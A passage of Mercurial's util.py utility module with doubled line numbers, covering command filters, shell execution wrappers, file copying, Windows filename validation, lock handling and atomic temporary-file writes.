953 953 cache[args] = func(*args)
954 954 else:
955 955 order.remove(args)
956 956 order.append(args)
957 957 return cache[args]
958 958
959 959 return f
960 960
961 961 class propertycache(object):
962 962 def __init__(self, func):
963 963 self.func = func
964 964 self.name = func.__name__
965 965 def __get__(self, obj, type=None):
966 966 result = self.func(obj)
967 967 self.cachevalue(obj, result)
968 968 return result
969 969
970 970 def cachevalue(self, obj, value):
971 971 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
972 972 obj.__dict__[self.name] = value
973 973
974 974 def clearcachedproperty(obj, prop):
975 975 '''clear a cached property value, if one has been set'''
976 976 if prop in obj.__dict__:
977 977 del obj.__dict__[prop]
978 978
979 979 def pipefilter(s, cmd):
980 980 '''filter string S through command CMD, returning its output'''
981 981 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
982 982 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
983 983 pout, perr = p.communicate(s)
984 984 return pout
985 985
986 986 def tempfilter(s, cmd):
987 987 '''filter string S through a pair of temporary files with CMD.
988 988 CMD is used as a template to create the real command to be run,
989 989 with the strings INFILE and OUTFILE replaced by the real names of
990 990 the temporary files generated.'''
991 991 inname, outname = None, None
992 992 try:
993 993 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
994 994 fp = os.fdopen(infd, pycompat.sysstr('wb'))
995 995 fp.write(s)
996 996 fp.close()
997 997 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
998 998 os.close(outfd)
999 999 cmd = cmd.replace('INFILE', inname)
1000 1000 cmd = cmd.replace('OUTFILE', outname)
1001 1001 code = os.system(cmd)
1002 1002 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1003 1003 code = 0
1004 1004 if code:
1005 1005 raise Abort(_("command '%s' failed: %s") %
1006 1006 (cmd, explainexit(code)))
1007 1007 return readfile(outname)
1008 1008 finally:
1009 1009 try:
1010 1010 if inname:
1011 1011 os.unlink(inname)
1012 1012 except OSError:
1013 1013 pass
1014 1014 try:
1015 1015 if outname:
1016 1016 os.unlink(outname)
1017 1017 except OSError:
1018 1018 pass
1019 1019
1020 1020 filtertable = {
1021 1021 'tempfile:': tempfilter,
1022 1022 'pipe:': pipefilter,
1023 1023 }
1024 1024
1025 1025 def filter(s, cmd):
1026 1026 "filter a string through a command that transforms its input to its output"
1027 1027 for name, fn in filtertable.iteritems():
1028 1028 if cmd.startswith(name):
1029 1029 return fn(s, cmd[len(name):].lstrip())
1030 1030 return pipefilter(s, cmd)
1031 1031
1032 1032 def binary(s):
1033 1033 """return true if a string is binary data"""
1034 1034 return bool(s and '\0' in s)
1035 1035
1036 1036 def increasingchunks(source, min=1024, max=65536):
1037 1037 '''return no less than min bytes per chunk while data remains,
1038 1038 doubling min after each chunk until it reaches max'''
1039 1039 def log2(x):
1040 1040 if not x:
1041 1041 return 0
1042 1042 i = 0
1043 1043 while x:
1044 1044 x >>= 1
1045 1045 i += 1
1046 1046 return i - 1
1047 1047
1048 1048 buf = []
1049 1049 blen = 0
1050 1050 for chunk in source:
1051 1051 buf.append(chunk)
1052 1052 blen += len(chunk)
1053 1053 if blen >= min:
1054 1054 if min < max:
1055 1055 min = min << 1
1056 1056 nmin = 1 << log2(blen)
1057 1057 if nmin > min:
1058 1058 min = nmin
1059 1059 if min > max:
1060 1060 min = max
1061 1061 yield ''.join(buf)
1062 1062 blen = 0
1063 1063 buf = []
1064 1064 if buf:
1065 1065 yield ''.join(buf)
1066 1066
1067 1067 Abort = error.Abort
1068 1068
1069 1069 def always(fn):
1070 1070 return True
1071 1071
1072 1072 def never(fn):
1073 1073 return False
1074 1074
1075 1075 def nogc(func):
1076 1076 """disable garbage collector
1077 1077
1078 1078 Python's garbage collector triggers a GC each time a certain number of
1079 1079 container objects (the number being defined by gc.get_threshold()) are
1080 1080 allocated even when marked not to be tracked by the collector. Tracking has
1081 1081 no effect on when GCs are triggered, only on what objects the GC looks
1082 1082 into. As a workaround, disable GC while building complex (huge)
1083 1083 containers.
1084 1084
1085 1085 This garbage collector issue have been fixed in 2.7. But it still affect
1086 1086 CPython's performance.
1087 1087 """
1088 1088 def wrapper(*args, **kwargs):
1089 1089 gcenabled = gc.isenabled()
1090 1090 gc.disable()
1091 1091 try:
1092 1092 return func(*args, **kwargs)
1093 1093 finally:
1094 1094 if gcenabled:
1095 1095 gc.enable()
1096 1096 return wrapper
1097 1097
1098 1098 if pycompat.ispypy:
1099 1099 # PyPy runs slower with gc disabled
1100 1100 nogc = lambda x: x
1101 1101
1102 1102 def pathto(root, n1, n2):
1103 1103 '''return the relative path from one place to another.
1104 1104 root should use os.sep to separate directories
1105 1105 n1 should use os.sep to separate directories
1106 1106 n2 should use "/" to separate directories
1107 1107 returns an os.sep-separated path.
1108 1108
1109 1109 If n1 is a relative path, it's assumed it's
1110 1110 relative to root.
1111 1111 n2 should always be relative to root.
1112 1112 '''
1113 1113 if not n1:
1114 1114 return localpath(n2)
1115 1115 if os.path.isabs(n1):
1116 1116 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1117 1117 return os.path.join(root, localpath(n2))
1118 1118 n2 = '/'.join((pconvert(root), n2))
1119 1119 a, b = splitpath(n1), n2.split('/')
1120 1120 a.reverse()
1121 1121 b.reverse()
1122 1122 while a and b and a[-1] == b[-1]:
1123 1123 a.pop()
1124 1124 b.pop()
1125 1125 b.reverse()
1126 1126 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1127 1127
1128 1128 def mainfrozen():
1129 1129 """return True if we are a frozen executable.
1130 1130
1131 1131 The code supports py2exe (most common, Windows only) and tools/freeze
1132 1132 (portable, not much used).
1133 1133 """
1134 1134 return (safehasattr(sys, "frozen") or # new py2exe
1135 1135 safehasattr(sys, "importers") or # old py2exe
1136 1136 imp.is_frozen(u"__main__")) # tools/freeze
1137 1137
1138 1138 # the location of data files matching the source code
1139 1139 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1140 1140 # executable version (py2exe) doesn't support __file__
1141 1141 datapath = os.path.dirname(pycompat.sysexecutable)
1142 1142 else:
1143 1143 datapath = os.path.dirname(pycompat.fsencode(__file__))
1144 1144
1145 1145 i18n.setdatapath(datapath)
1146 1146
1147 1147 _hgexecutable = None
1148 1148
1149 1149 def hgexecutable():
1150 1150 """return location of the 'hg' executable.
1151 1151
1152 1152 Defaults to $HG or 'hg' in the search path.
1153 1153 """
1154 1154 if _hgexecutable is None:
1155 1155 hg = encoding.environ.get('HG')
1156 1156 mainmod = sys.modules[pycompat.sysstr('__main__')]
1157 1157 if hg:
1158 1158 _sethgexecutable(hg)
1159 1159 elif mainfrozen():
1160 1160 if getattr(sys, 'frozen', None) == 'macosx_app':
1161 1161 # Env variable set by py2app
1162 1162 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1163 1163 else:
1164 1164 _sethgexecutable(pycompat.sysexecutable)
1165 1165 elif (os.path.basename(
1166 1166 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1167 1167 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1168 1168 else:
1169 1169 exe = findexe('hg') or os.path.basename(sys.argv[0])
1170 1170 _sethgexecutable(exe)
1171 1171 return _hgexecutable
1172 1172
1173 1173 def _sethgexecutable(path):
1174 1174 """set location of the 'hg' executable"""
1175 1175 global _hgexecutable
1176 1176 _hgexecutable = path
1177 1177
1178 1178 def _isstdout(f):
1179 1179 fileno = getattr(f, 'fileno', None)
1180 1180 return fileno and fileno() == sys.__stdout__.fileno()
1181 1181
1182 1182 def shellenviron(environ=None):
1183 1183 """return environ with optional override, useful for shelling out"""
1184 1184 def py2shell(val):
1185 1185 'convert python object into string that is useful to shell'
1186 1186 if val is None or val is False:
1187 1187 return '0'
1188 1188 if val is True:
1189 1189 return '1'
1190 1190 return str(val)
1191 1191 env = dict(encoding.environ)
1192 1192 if environ:
1193 1193 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1194 1194 env['HG'] = hgexecutable()
1195 1195 return env
1196 1196
1197 1197 def system(cmd, environ=None, cwd=None, out=None):
1198 1198 '''enhanced shell command execution.
1199 1199 run with environment maybe modified, maybe in different dir.
1200 1200
1201 1201 if out is specified, it is assumed to be a file-like object that has a
1202 1202 write() method. stdout and stderr will be redirected to out.'''
1203 1203 try:
1204 1204 stdout.flush()
1205 1205 except Exception:
1206 1206 pass
1207 1207 cmd = quotecommand(cmd)
1208 1208 env = shellenviron(environ)
1209 1209 if out is None or _isstdout(out):
1210 1210 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1211 1211 env=env, cwd=cwd)
1212 1212 else:
1213 1213 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1214 1214 env=env, cwd=cwd, stdout=subprocess.PIPE,
1215 1215 stderr=subprocess.STDOUT)
1216 1216 for line in iter(proc.stdout.readline, ''):
1217 1217 out.write(line)
1218 1218 proc.wait()
1219 1219 rc = proc.returncode
1220 1220 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1221 1221 rc = 0
1222 1222 return rc
1223 1223
1224 1224 def checksignature(func):
1225 1225 '''wrap a function with code to check for calling errors'''
1226 1226 def check(*args, **kwargs):
1227 1227 try:
1228 1228 return func(*args, **kwargs)
1229 1229 except TypeError:
1230 1230 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1231 1231 raise error.SignatureError
1232 1232 raise
1233 1233
1234 1234 return check
1235 1235
1236 1236 # a whilelist of known filesystems where hardlink works reliably
1237 1237 _hardlinkfswhitelist = {
1238 1238 'btrfs',
1239 1239 'ext2',
1240 1240 'ext3',
1241 1241 'ext4',
1242 1242 'hfs',
1243 1243 'jfs',
1244 1244 'NTFS',
1245 1245 'reiserfs',
1246 1246 'tmpfs',
1247 1247 'ufs',
1248 1248 'xfs',
1249 1249 'zfs',
1250 1250 }
1251 1251
1252 1252 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1253 1253 '''copy a file, preserving mode and optionally other stat info like
1254 1254 atime/mtime
1255 1255
1256 1256 checkambig argument is used with filestat, and is useful only if
1257 1257 destination file is guarded by any lock (e.g. repo.lock or
1258 1258 repo.wlock).
1259 1259
1260 1260 copystat and checkambig should be exclusive.
1261 1261 '''
1262 1262 assert not (copystat and checkambig)
1263 1263 oldstat = None
1264 1264 if os.path.lexists(dest):
1265 1265 if checkambig:
1266 1266 oldstat = checkambig and filestat.frompath(dest)
1267 1267 unlink(dest)
1268 1268 if hardlink:
1269 1269 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1270 1270 # unless we are confident that dest is on a whitelisted filesystem.
1271 1271 try:
1272 1272 fstype = getfstype(os.path.dirname(dest))
1273 1273 except OSError:
1274 1274 fstype = None
1275 1275 if fstype not in _hardlinkfswhitelist:
1276 1276 hardlink = False
1277 1277 if hardlink:
1278 1278 try:
1279 1279 oslink(src, dest)
1280 1280 return
1281 1281 except (IOError, OSError):
1282 1282 pass # fall back to normal copy
1283 1283 if os.path.islink(src):
1284 1284 os.symlink(os.readlink(src), dest)
1285 1285 # copytime is ignored for symlinks, but in general copytime isn't needed
1286 1286 # for them anyway
1287 1287 else:
1288 1288 try:
1289 1289 shutil.copyfile(src, dest)
1290 1290 if copystat:
1291 1291 # copystat also copies mode
1292 1292 shutil.copystat(src, dest)
1293 1293 else:
1294 1294 shutil.copymode(src, dest)
1295 1295 if oldstat and oldstat.stat:
1296 1296 newstat = filestat.frompath(dest)
1297 1297 if newstat.isambig(oldstat):
1298 1298 # stat of copied file is ambiguous to original one
1299 1299 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1300 1300 os.utime(dest, (advanced, advanced))
1301 1301 except shutil.Error as inst:
1302 1302 raise Abort(str(inst))
1303 1303
1304 1304 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1305 1305 """Copy a directory tree using hardlinks if possible."""
1306 1306 num = 0
1307 1307
1308 1308 gettopic = lambda: hardlink and _('linking') or _('copying')
1309 1309
1310 1310 if os.path.isdir(src):
1311 1311 if hardlink is None:
1312 1312 hardlink = (os.stat(src).st_dev ==
1313 1313 os.stat(os.path.dirname(dst)).st_dev)
1314 1314 topic = gettopic()
1315 1315 os.mkdir(dst)
1316 1316 for name, kind in listdir(src):
1317 1317 srcname = os.path.join(src, name)
1318 1318 dstname = os.path.join(dst, name)
1319 1319 def nprog(t, pos):
1320 1320 if pos is not None:
1321 1321 return progress(t, pos + num)
1322 1322 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1323 1323 num += n
1324 1324 else:
1325 1325 if hardlink is None:
1326 1326 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1327 1327 os.stat(os.path.dirname(dst)).st_dev)
1328 1328 topic = gettopic()
1329 1329
1330 1330 if hardlink:
1331 1331 try:
1332 1332 oslink(src, dst)
1333 1333 except (IOError, OSError):
1334 1334 hardlink = False
1335 1335 shutil.copy(src, dst)
1336 1336 else:
1337 1337 shutil.copy(src, dst)
1338 1338 num += 1
1339 1339 progress(topic, num)
1340 1340 progress(topic, None)
1341 1341
1342 1342 return hardlink, num
1343 1343
1344 1344 _winreservednames = {
1345 1345 'con', 'prn', 'aux', 'nul',
1346 1346 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1347 1347 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1348 1348 }
1349 1349 _winreservedchars = ':*?"<>|'
1350 1350 def checkwinfilename(path):
1351 1351 r'''Check that the base-relative path is a valid filename on Windows.
1352 1352 Returns None if the path is ok, or a UI string describing the problem.
1353 1353
1354 1354 >>> checkwinfilename(b"just/a/normal/path")
1355 1355 >>> checkwinfilename(b"foo/bar/con.xml")
1356 1356 "filename contains 'con', which is reserved on Windows"
1357 1357 >>> checkwinfilename(b"foo/con.xml/bar")
1358 1358 "filename contains 'con', which is reserved on Windows"
1359 1359 >>> checkwinfilename(b"foo/bar/xml.con")
1360 1360 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1361 1361 "filename contains 'AUX', which is reserved on Windows"
1362 1362 >>> checkwinfilename(b"foo/bar/bla:.txt")
1363 1363 "filename contains ':', which is reserved on Windows"
1364 1364 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1365 1365 "filename contains '\\x07', which is invalid on Windows"
1366 1366 >>> checkwinfilename(b"foo/bar/bla ")
1367 1367 "filename ends with ' ', which is not allowed on Windows"
1368 1368 >>> checkwinfilename(b"../bar")
1369 1369 >>> checkwinfilename(b"foo\\")
1370 1370 "filename ends with '\\', which is invalid on Windows"
1371 1371 >>> checkwinfilename(b"foo\\/bar")
1372 1372 "directory name ends with '\\', which is invalid on Windows"
1373 1373 '''
1374 1374 if path.endswith('\\'):
1375 1375 return _("filename ends with '\\', which is invalid on Windows")
1376 1376 if '\\/' in path:
1377 1377 return _("directory name ends with '\\', which is invalid on Windows")
1378 1378 for n in path.replace('\\', '/').split('/'):
1379 1379 if not n:
1380 1380 continue
1381 1381 for c in _filenamebytestr(n):
1382 1382 if c in _winreservedchars:
1383 1383 return _("filename contains '%s', which is reserved "
1384 1384 "on Windows") % c
1385 1385 if ord(c) <= 31:
1386 1386 return _("filename contains '%s', which is invalid "
1387 1387 "on Windows") % escapestr(c)
1388 1388 base = n.split('.')[0]
1389 1389 if base and base.lower() in _winreservednames:
1390 1390 return _("filename contains '%s', which is reserved "
1391 1391 "on Windows") % base
1392 1392 t = n[-1:]
1393 1393 if t in '. ' and n not in '..':
1394 1394 return _("filename ends with '%s', which is not allowed "
1395 1395 "on Windows") % t
1396 1396
1397 1397 if pycompat.iswindows:
1398 1398 checkosfilename = checkwinfilename
1399 1399 timer = time.clock
1400 1400 else:
1401 1401 checkosfilename = platform.checkosfilename
1402 1402 timer = time.time
1403 1403
1404 1404 if safehasattr(time, "perf_counter"):
1405 1405 timer = time.perf_counter
1406 1406
1407 1407 def makelock(info, pathname):
1408 1408 try:
1409 1409 return os.symlink(info, pathname)
1410 1410 except OSError as why:
1411 1411 if why.errno == errno.EEXIST:
1412 1412 raise
1413 1413 except AttributeError: # no symlink in os
1414 1414 pass
1415 1415
1416 1416 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1417 1417 os.write(ld, info)
1418 1418 os.close(ld)
1419 1419
1420 1420 def readlock(pathname):
1421 1421 try:
1422 1422 return os.readlink(pathname)
1423 1423 except OSError as why:
1424 1424 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1425 1425 raise
1426 1426 except AttributeError: # no symlink in os
1427 1427 pass
1428 1428 fp = posixfile(pathname)
1429 1429 r = fp.read()
1430 1430 fp.close()
1431 1431 return r
1432 1432
1433 1433 def fstat(fp):
1434 1434 '''stat file object that may not have fileno method.'''
1435 1435 try:
1436 1436 return os.fstat(fp.fileno())
1437 1437 except AttributeError:
1438 1438 return os.stat(fp.name)
1439 1439
1440 1440 # File system features
1441 1441
1442 1442 def fscasesensitive(path):
1443 1443 """
1444 1444 Return true if the given path is on a case-sensitive filesystem
1445 1445
1446 1446 Requires a path (like /foo/.hg) ending with a foldable final
1447 1447 directory component.
1448 1448 """
1449 1449 s1 = os.lstat(path)
1450 1450 d, b = os.path.split(path)
1451 1451 b2 = b.upper()
1452 1452 if b == b2:
1453 1453 b2 = b.lower()
1454 1454 if b == b2:
1455 1455 return True # no evidence against case sensitivity
1456 1456 p2 = os.path.join(d, b2)
1457 1457 try:
1458 1458 s2 = os.lstat(p2)
1459 1459 if s2 == s1:
1460 1460 return False
1461 1461 return True
1462 1462 except OSError:
1463 1463 return True
1464 1464
1465 1465 try:
1466 1466 import re2
1467 1467 _re2 = None
1468 1468 except ImportError:
1469 1469 _re2 = False
1470 1470
1471 1471 class _re(object):
1472 1472 def _checkre2(self):
1473 1473 global _re2
1474 1474 try:
1475 1475 # check if match works, see issue3964
1476 1476 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1477 1477 except ImportError:
1478 1478 _re2 = False
1479 1479
1480 1480 def compile(self, pat, flags=0):
1481 1481 '''Compile a regular expression, using re2 if possible
1482 1482
1483 1483 For best performance, use only re2-compatible regexp features. The
1484 1484 only flags from the re module that are re2-compatible are
1485 1485 IGNORECASE and MULTILINE.'''
1486 1486 if _re2 is None:
1487 1487 self._checkre2()
1488 1488 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1489 1489 if flags & remod.IGNORECASE:
1490 1490 pat = '(?i)' + pat
1491 1491 if flags & remod.MULTILINE:
1492 1492 pat = '(?m)' + pat
1493 1493 try:
1494 1494 return re2.compile(pat)
1495 1495 except re2.error:
1496 1496 pass
1497 1497 return remod.compile(pat, flags)
1498 1498
1499 1499 @propertycache
1500 1500 def escape(self):
1501 1501 '''Return the version of escape corresponding to self.compile.
1502 1502
1503 1503 This is imperfect because whether re2 or re is used for a particular
1504 1504 function depends on the flags, etc, but it's the best we can do.
1505 1505 '''
1506 1506 global _re2
1507 1507 if _re2 is None:
1508 1508 self._checkre2()
1509 1509 if _re2:
1510 1510 return re2.escape
1511 1511 else:
1512 1512 return remod.escape
1513 1513
1514 1514 re = _re()
1515 1515
1516 1516 _fspathcache = {}
1517 1517 def fspath(name, root):
1518 1518 '''Get name in the case stored in the filesystem
1519 1519
1520 1520 The name should be relative to root, and be normcase-ed for efficiency.
1521 1521
1522 1522 Note that this function is unnecessary, and should not be
1523 1523 called, for case-sensitive filesystems (simply because it's expensive).
1524 1524
1525 1525 The root should be normcase-ed, too.
1526 1526 '''
1527 1527 def _makefspathcacheentry(dir):
1528 1528 return dict((normcase(n), n) for n in os.listdir(dir))
1529 1529
1530 1530 seps = pycompat.ossep
1531 1531 if pycompat.osaltsep:
1532 1532 seps = seps + pycompat.osaltsep
1533 1533 # Protect backslashes. This gets silly very quickly.
1534 1534 seps.replace('\\','\\\\')
1535 1535 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1536 1536 dir = os.path.normpath(root)
1537 1537 result = []
1538 1538 for part, sep in pattern.findall(name):
1539 1539 if sep:
1540 1540 result.append(sep)
1541 1541 continue
1542 1542
1543 1543 if dir not in _fspathcache:
1544 1544 _fspathcache[dir] = _makefspathcacheentry(dir)
1545 1545 contents = _fspathcache[dir]
1546 1546
1547 1547 found = contents.get(part)
1548 1548 if not found:
1549 1549 # retry "once per directory" per "dirstate.walk" which
1550 1550 # may take place for each patches of "hg qpush", for example
1551 1551 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1552 1552 found = contents.get(part)
1553 1553
1554 1554 result.append(found or part)
1555 1555 dir = os.path.join(dir, part)
1556 1556
1557 1557 return ''.join(result)
1558 1558
1559 1559 def checknlink(testfile):
1560 1560 '''check whether hardlink count reporting works properly'''
1561 1561
1562 1562 # testfile may be open, so we need a separate file for checking to
1563 1563 # work around issue2543 (or testfile may get lost on Samba shares)
1564 1564 f1, f2, fp = None, None, None
1565 1565 try:
1566 1566 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1567 1567 suffix='1~', dir=os.path.dirname(testfile))
1568 1568 os.close(fd)
1569 1569 f2 = '%s2~' % f1[:-2]
1570 1570
1571 1571 oslink(f1, f2)
1572 1572 # nlinks() may behave differently for files on Windows shares if
1573 1573 # the file is open.
1574 1574 fp = posixfile(f2)
1575 1575 return nlinks(f2) > 1
1576 1576 except OSError:
1577 1577 return False
1578 1578 finally:
1579 1579 if fp is not None:
1580 1580 fp.close()
1581 1581 for f in (f1, f2):
1582 1582 try:
1583 1583 if f is not None:
1584 1584 os.unlink(f)
1585 1585 except OSError:
1586 1586 pass
1587 1587
1588 1588 def endswithsep(path):
1589 1589 '''Check path ends with os.sep or os.altsep.'''
1590 1590 return (path.endswith(pycompat.ossep)
1591 1591 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1592 1592
1593 1593 def splitpath(path):
1594 1594 '''Split path by os.sep.
1595 1595 Note that this function does not use os.altsep because this is
1596 1596 an alternative of simple "xxx.split(os.sep)".
1597 1597 It is recommended to use os.path.normpath() before using this
1598 1598 function if need.'''
1599 1599 return path.split(pycompat.ossep)
1600 1600
1601 1601 def gui():
1602 1602 '''Are we running in a GUI?'''
1603 1603 if pycompat.isdarwin:
1604 1604 if 'SSH_CONNECTION' in encoding.environ:
1605 1605 # handle SSH access to a box where the user is logged in
1606 1606 return False
1607 1607 elif getattr(osutil, 'isgui', None):
1608 1608 # check if a CoreGraphics session is available
1609 1609 return osutil.isgui()
1610 1610 else:
1611 1611 # pure build; use a safe default
1612 1612 return True
1613 1613 else:
1614 1614 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1615 1615
1616 1616 def mktempcopy(name, emptyok=False, createmode=None):
1617 1617 """Create a temporary file with the same contents from name
1618 1618
1619 1619 The permission bits are copied from the original file.
1620 1620
1621 1621 If the temporary file is going to be truncated immediately, you
1622 1622 can use emptyok=True as an optimization.
1623 1623
1624 1624 Returns the name of the temporary file.
1625 1625 """
1626 1626 d, fn = os.path.split(name)
1627 1627 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1628 1628 os.close(fd)
1629 1629 # Temporary files are created with mode 0600, which is usually not
1630 1630 # what we want. If the original file already exists, just copy
1631 1631 # its mode. Otherwise, manually obey umask.
1632 1632 copymode(name, temp, createmode)
1633 1633 if emptyok:
1634 1634 return temp
1635 1635 try:
1636 1636 try:
1637 1637 ifp = posixfile(name, "rb")
1638 1638 except IOError as inst:
1639 1639 if inst.errno == errno.ENOENT:
1640 1640 return temp
1641 1641 if not getattr(inst, 'filename', None):
1642 1642 inst.filename = name
1643 1643 raise
1644 1644 ofp = posixfile(temp, "wb")
1645 1645 for chunk in filechunkiter(ifp):
1646 1646 ofp.write(chunk)
1647 1647 ifp.close()
1648 1648 ofp.close()
1649 1649 except: # re-raises
1650 1650 try:
1651 1651 os.unlink(temp)
1652 1652 except OSError:
1653 1653 pass
1654 1654 raise
1655 1655 return temp
1656 1656
1657 1657 class filestat(object):
1658 1658 """help to exactly detect change of a file
1659 1659
1660 1660 'stat' attribute is result of 'os.stat()' if specified 'path'
1661 1661 exists. Otherwise, it is None. This can avoid preparative
1662 1662 'exists()' examination on client side of this class.
1663 1663 """
1664 1664 def __init__(self, stat):
1665 1665 self.stat = stat
1666 1666
1667 1667 @classmethod
1668 1668 def frompath(cls, path):
1669 1669 try:
1670 1670 stat = os.stat(path)
1671 1671 except OSError as err:
1672 1672 if err.errno != errno.ENOENT:
1673 1673 raise
1674 1674 stat = None
1675 1675 return cls(stat)
1676 1676
1677 1677 @classmethod
1678 1678 def fromfp(cls, fp):
1679 1679 stat = os.fstat(fp.fileno())
1680 1680 return cls(stat)
1681 1681
1682 1682 __hash__ = object.__hash__
1683 1683
1684 1684 def __eq__(self, old):
1685 1685 try:
1686 1686 # if ambiguity between stat of new and old file is
1687 1687 # avoided, comparison of size, ctime and mtime is enough
1688 1688 # to exactly detect change of a file regardless of platform
1689 1689 return (self.stat.st_size == old.stat.st_size and
1690 1690 self.stat.st_ctime == old.stat.st_ctime and
1691 1691 self.stat.st_mtime == old.stat.st_mtime)
1692 1692 except AttributeError:
1693 1693 pass
1694 1694 try:
1695 1695 return self.stat is None and old.stat is None
1696 1696 except AttributeError:
1697 1697 return False
1698 1698
1699 1699 def isambig(self, old):
1700 1700 """Examine whether new (= self) stat is ambiguous against old one
1701 1701
1702 1702 "S[N]" below means stat of a file at N-th change:
1703 1703
1704 1704 - S[n-1].ctime < S[n].ctime: can detect change of a file
1705 1705 - S[n-1].ctime == S[n].ctime
1706 1706 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1707 1707 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1708 1708 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1709 1709 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1710 1710
1711 1711 Case (*2) above means that a file was changed twice or more at
1712 1712 same time in sec (= S[n-1].ctime), and comparison of timestamp
1713 1713 is ambiguous.
1714 1714
1715 1715 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1716 1716 timestamp is ambiguous".
1717 1717
1718 1718 But advancing mtime only in case (*2) doesn't work as
1719 1719 expected, because naturally advanced S[n].mtime in case (*1)
1720 1720 might be equal to manually advanced S[n-1 or earlier].mtime.
1721 1721
1722 1722 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1723 1723 treated as ambiguous regardless of mtime, to avoid overlooking
1724 1724 by confliction between such mtime.
1725 1725
1726 1726 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1727 1727 S[n].mtime", even if size of a file isn't changed.
1728 1728 """
1729 1729 try:
1730 1730 return (self.stat.st_ctime == old.stat.st_ctime)
1731 1731 except AttributeError:
1732 1732 return False
1733 1733
1734 1734 def avoidambig(self, path, old):
1735 1735 """Change file stat of specified path to avoid ambiguity
1736 1736
1737 1737 'old' should be previous filestat of 'path'.
1738 1738
1739 1739 This skips avoiding ambiguity, if a process doesn't have
1740 1740 appropriate privileges for 'path'. This returns False in this
1741 1741 case.
1742 1742
1743 1743 Otherwise, this returns True, as "ambiguity is avoided".
1744 1744 """
1745 1745 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1746 1746 try:
1747 1747 os.utime(path, (advanced, advanced))
1748 1748 except OSError as inst:
1749 1749 if inst.errno == errno.EPERM:
1750 1750 # utime() on the file created by another user causes EPERM,
1751 1751 # if a process doesn't have appropriate privileges
1752 1752 return False
1753 1753 raise
1754 1754 return True
1755 1755
1756 1756 def __ne__(self, other):
1757 1757 return not self == other
1758 1758
1759 1759 class atomictempfile(object):
1760 1760 '''writable file object that atomically updates a file
1761 1761
1762 1762 All writes will go to a temporary copy of the original file. Call
1763 1763 close() when you are done writing, and atomictempfile will rename
1764 1764 the temporary copy to the original name, making the changes
1765 1765 visible. If the object is destroyed without being closed, all your
1766 1766 writes are discarded.
1767 1767
1768 1768 checkambig argument of constructor is used with filestat, and is
1769 1769 useful only if target file is guarded by any lock (e.g. repo.lock
1770 1770 or repo.wlock).
1771 1771 '''
1772 1772 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1773 1773 self.__name = name # permanent name
1774 1774 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1775 1775 createmode=createmode)
1776 1776 self._fp = posixfile(self._tempname, mode)
1777 1777 self._checkambig = checkambig
1778 1778
1779 1779 # delegated methods
1780 1780 self.read = self._fp.read
1781 1781 self.write = self._fp.write
1782 1782 self.seek = self._fp.seek
1783 1783 self.tell = self._fp.tell
1784 1784 self.fileno = self._fp.fileno
1785 1785
1786 1786 def close(self):
1787 1787 if not self._fp.closed:
1788 1788 self._fp.close()
1789 1789 filename = localpath(self.__name)
1790 1790 oldstat = self._checkambig and filestat.frompath(filename)
1791 1791 if oldstat and oldstat.stat:
1792 1792 rename(self._tempname, filename)
1793 1793 newstat = filestat.frompath(filename)
1794 1794 if newstat.isambig(oldstat):
1795 1795 # stat of changed file is ambiguous to original one
1796 1796 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1797 1797 os.utime(filename, (advanced, advanced))
1798 1798 else:
1799 1799 rename(self._tempname, filename)
1800 1800
1801 1801 def discard(self):
1802 1802 if not self._fp.closed:
1803 1803 try:
1804 1804 os.unlink(self._tempname)
1805 1805 except OSError:
1806 1806 pass
1807 1807 self._fp.close()
1808 1808
1809 1809 def __del__(self):
1810 1810 if safehasattr(self, '_fp'): # constructor actually did something
1811 1811 self.discard()
1812 1812
1813 1813 def __enter__(self):
1814 1814 return self
1815 1815
1816 1816 def __exit__(self, exctype, excvalue, traceback):
1817 1817 if exctype is not None:
